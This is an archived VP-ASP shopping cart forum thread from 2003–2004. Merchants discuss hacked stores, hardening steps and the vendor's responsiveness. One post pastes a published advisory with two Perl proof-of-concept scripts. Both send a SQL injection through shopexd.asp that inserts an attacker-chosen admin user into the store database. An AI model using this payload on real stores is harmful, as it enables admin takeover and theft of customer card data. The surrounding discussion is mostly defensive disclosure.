VP-ASP :: Shopping Cart Software

Shopping Cart Software Solutions for anywhere in the World

US/Canada(Toll Free): +1 888 587 2278
Europe/UK: +44 (020) 7193 9408
Australia/New Zealand: +61 3 9016 4497

VP-ASP Shopping Cart Customer Forum

Home | Profile | Register | Active Topics | Members | Search | FAQ
Save Password
Forgot your Password?

 All Forums
 VPCart Forum
 Credit card fraud and hackers
 List of Hacked Stores being shared by Hackers
 New Topic  Reply to Topic
 Printer Friendly
Author Previous Topic Topic Next Topic  

Starting Member

1 Posts

Posted - February 06 2003 :  10:42:19  Show Profile  Reply with Quote
Hi all,

I do not have a store, but thought that those who do might want to be aware : This is from a list post this morning:

I recently intercepted an email from an Indonesian guy.

That email contained a whole list of online shops (URLs) that use the VP-ASP Shopping cart software. (see http://www.vpasp.com)

For all the shops mentioned in that list they had the correct admin password and login name. This means that shopping cart software is extremely vulnerable for hacking !
It seems easy to download the databases from such a shopping cart system which includes all customer info, creditcard numbers and so on...

If you are using this software I suggest you secure it immediately because they are watching you !


I was not even aware of this shopping cart software, there are so many out there... but for what it's worth, I fugured will post this so you all can secure your databases, CHANGE YOUR PASSWORDS!
Best Regards
Genie Livingstone

VP-ASP Super User

361 Posts

Posted - February 06 2003 :  16:21:28  Show Profile  Visit Cam's Homepage  Reply with Quote
Thanks Uneeeq,

VPASP is vulnerable if 3 things are not done and a lot of carts are in this situation. The same goes for our YourVitualStore customers.

Firstly, if the shopdbtest.asp and the shopa_sessionlist.asp pages are not either deleted or renamed a hacker can use them to discover the location of your database.

Secondly if you do not change your username and password from the default VPASP ones hackers can simply waltz into your store.

Thirdly the database that comes with VPASP is not in a secure directory. This needs to be done. Your host can set up a folder that is either "off-web", and inaccessible to web brosers, or protect a folder that is part of your web site so that HTTP access is blocked.

If this is not done the hacker can simply innsert the path to the db and download at his leisure.

These points are in the help notes and should be followed immediately before your site goes live.

It has also been mentioned on numerous posts as well.

Protect yourself!!!

Cheers Cam,

Cam Flanigan
YourVirtualStore Sales
e-mail: http://www.vpasp.com/sales/shopcustcontact.asp
web: http://www.yourvirtualstore.net

Build you own YourVirtualStore!!!
Go to Top of Page

VP-ASP Super User

361 Posts

Posted - February 10 2004 :  09:15:02  Show Profile  Visit Cam's Homepage  Reply with Quote
This was a post I made a year ago.

A few changes to make it relevant.

The new pages to delete are:


any file starting with covert_

Make sure you place your db in a secure folder that is set up by your web host. You can test this by inserting the name of your db into the browser address bar. If you can download your database then it isn't secure.

For example:


Change the above to match your database location.

Change your shoplogin.asp name to something unique.

Update your Administration Security to accept the new name.

Change the xshopid setting in shop$config.asp to something unique to your site.

Set xshowadmin to NO in the admin so if hackers insewrt shopadmin1.asp into the address bar they are simply returnewd to the default page rather than the admin login page.

Read and implement all VPASP security notices.

Just had a number of our customers let us know that they have been having unwelcome visitors so thought it timely to repost this basic information.


Cam Flanigan
YourVirtualStore Sales
web: http://www.yourvirtualstore.net

Build you own YourVirtualStore!!!
Go to Top of Page

Starting Member

4 Posts

Posted - February 19 2004 :  19:57:25  Show Profile  Reply with Quote
I hate to say it, but shopexd.asp is wide open. It's so easy to give yourself admin access to the database or run any sql insertion code from this page it is almost pathetic.

I'm glad I put in your 2 password security. After doing everything you recommended, I still got hacked. I'm very concerned about the security of this software. We have had several credit card informations stolen and even after applying your patches I'm still getting hacked.

Please quit pretending it's not there and fix it.

Go to Top of Page


4263 Posts

Posted - February 20 2004 :  00:08:17  Show Profile  Visit support's Homepage  Reply with Quote
If there is a security hole we certainly want to know about it. Please write directly to support (http://www.vpasp.com/sales/shopcustcontact.asp) and explain why you think there is a security issue with shopexd.asp.

Please see www.vpasp.com/virtprog/info/faq_securityfixes.htm

We ourselves are under attack 365 days a year and we follow the same guidelines we ask our customers to follow.

Howard Kadetz

Go to Top of Page

Starting Member

4 Posts

Posted - February 20 2004 :  09:03:12  Show Profile  Reply with Quote
If you don't know about this one, then I'm not sure that sending you how I "think" there is a hole would do any good.

I did a search on Google about hacking and vp-asp. I came up with a nice list of big open holes. One company out there even shows exactly how to exploit your shopping software.

It wouldn't take a rocket scientist to figure out how to further exploit that hole. If you don't know about the obvious ones and you want me to "show" you what everyone BUT you knows about, then why bother? It almost seems painfully obvious you don't want to know about it.

By-the-way, the company listing your open door also said they notified you about the problem and got no response. What does that say about your interest in fixing up the security??

Go to Top of Page

VP-ASP New User

194 Posts

Posted - February 20 2004 :  13:59:29  Show Profile  Visit siraj's Homepage  Reply with Quote
Hi ljr0,
I dont know wheather you are trying to help or hack. If you really a VP-ASP user and know the holes in the software, you can post the solutions or problem or email to support. They will ,of course, take care of that. If you are just browsing the google to find how to hack VP-ASP, and alerting the rest of users to be paranoid, what is the use of it and what is your point?

[email protected]
Go to Top of Page

Starting Member

4 Posts

Posted - February 20 2004 :  16:35:58  Show Profile  Reply with Quote
Why should I send my little info to support if they can't take the time to find out for themselves where the holes are? The fact that someone has already told them where the hole is (and the hole is still there), is sufficient reason for me to raise concerns that the developers of this software either don't care or don't know how to figure it out.

If I'm paying for a product, then they should have the resources to find these things and get them fixed. But maybe you don't agree with that.

I'll send the code clip that has the open hole. But I doubt I will ever hear from them on how to fix the problem even though I'm a customer. That really torques me off too.

Go to Top of Page

VP-ASP New User

194 Posts

Posted - February 20 2004 :  20:43:01  Show Profile  Visit siraj's Homepage  Reply with Quote
I did not mean to say I dont agree with you. If there is holes, of course, need fix. My point is, we can facilitates them to find out sooner by providing the sources. More you wait, more risk we take. You can be generosus enough to send the code or point where the problem is, then I hope the VP-ASP users will appreciate you even though if not the vendors.
Hope you will understand.

[email protected]
Go to Top of Page

Starting Member

3 Posts

Posted - February 24 2004 :  00:40:15  Show Profile  Reply with Quote
Heres the article hes talking about

Go to Top of Page

Starting Member

3 Posts

Posted - February 24 2004 :  00:42:33  Show Profile  Reply with Quote
F*** it heres the the whole thing
by Bosen
#!/usr/bin/perl -w
$pamer = "
1ndonesian Security Team (1st)
tio-fux.pl, vpasp SQL Injection Proof of Concept
Exploit by : Bosen & TioEuy
Discover by : TioEuy, AresU
Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,
muthafuka all #hackers\@centrin.net.id/austnet.org
"; # shut up ! we're the best in our country :)

use LWP::UserAgent; # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password>
my $biji =
$tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";

my $bosen = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol = $bosen->request($gembel);
if ($dodol->is_error()) {
printf " %s\n", $dodol->status_line;
} else {
print "Tuing !\n";
print "\n680165\n";

by Aresu
# 1ndonesian Security Team (1st)
# ==============================
# VP-ASP Shopping Cart - Exploit
# Discover by : TioEuy & AresU;
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all
# [email protected]/austnet.org, #[email protected]
# http://bosen.net/releases/
use Socket;

$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
$pieldnya = '"fldusername","fldpassword","fldaccess"';

if ($#ARGV<4)
print "\n$dodolbasik";
print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user>
<password> \n\n";
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret=~s/\ /%20/g;
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;

$target = inet_aton($host);
print $gembel;
print @hasil;

# ------------- Sendraw - thanx RFP [email protected]
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;

socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");

if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;

Vendor Response:
Contacted. No response.

No recommendation for this.

1ndonesian Security Team (1st) Advisory:

About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application security assessment. Based in Indonesia, 1ndonesian Security
Team offers best of breed security consulting services, specialising in
application, host and network security assessments.

1st provides security information and patches for use by the entire 1st

This information is provided freely to all interested parties and may be
redistributed provided that it is not altered in any way, 1st is
credited and the document retains.

Greetz to:
Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu,
riico, w4n, negative
All 1ndonesian Security Team - #[email protected]/centrin.net.id

AresU <[email protected]>
Original document can be fount at http://www.bosen.net/releases/?id=41

Go to Top of Page

VP-ASP New User

122 Posts

Posted - February 24 2004 :  00:50:28  Show Profile  Reply with Quote
First look at the security fixes that have been posted then there will be no holes.



Go to Top of Page

Starting Member

39 Posts

Posted - March 02 2004 :  08:58:37  Show Profile  Visit jsbeads's Homepage  Reply with Quote
That easy just test to see if ID is numeric. Just like the fixes say.

Go to Top of Page

VP-ASP New User

199 Posts

Posted - March 29 2004 :  14:56:38  Show Profile  Visit ProductivePC's Homepage  Reply with Quote


It is very obvious that you are not a programmer and do not understand security issues. What operating system do you use for your computer? Windows? Do you know how many security issues there are with that? How many loopholes. The people at VPASP have taken great pains to make sure that every REPORTED security flaw is taken care of right away. Let Microslop tell you that.

Whenever you program something there are ALWAYS bugs in the programming. You work through those bugs and fix them as they come about. That is what is called a debugging process. To expect that a programmer will know all aspects of every security flaw for every type of language that can be used to implement one is ludicrous and unreasonable.

This is why every program out there depends on people to find them and turn them in in order to fix them. Your AOL version that you are using to sign onto the Internet with right now.... it too has flaws and damages the Microslop OS registry and can be hacked easier than eating Apple Pie however AOL depends on you reporting that to them in order to fix it.

Same thing with MS OS. Same thing with Linux Bugs. Same thing with almost any piece of software out there. At least VPASP is willing to hear your request and fix it..... you should be thankful of that. Most of the other shopping carts wouldn't even go that far. They would consider you just a fly on the wall and not even want to speak or hear from you because you are not as intelligent as them (in their mind) Fortunately enough, VPASP developers are not like that.

As for contacting the people. EVERY e-mail, without fail, that I have ever sent to VPASP has been returned by a person with a personalized thank you note and not by an auto responder. I consider that phenomenal service! How easy is it for me to say I sent an e-mail to ljr0 and I did not get a return. Hey look guys, I wrote it in a forum post... it must be true! Here let me write it again. I sent an e-mail to ljr0 talking about this post and have not gotten a return therefore he must not be interested in responding or fixing his posts. We see how far that goes!

However; instead of making the problem worse you could have saved us all the aggravation and time and just let them know off the bat what the security loophole was that YOU were concerned about. At the point of time that you refused to mention it, you were no longer part of the solution you now became part of the problem!

Well, that is my two cents. Sorry if that is a little rough for your forums Howard; however I have seen the pains you all have taken to get this cart where it needs to be and I have seen the many posts help many people and I have seen the security fixes work.


Edited by - ProductivePC on March 29 2004 14:59:58
Go to Top of Page
  Previous Topic Topic Next Topic  
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000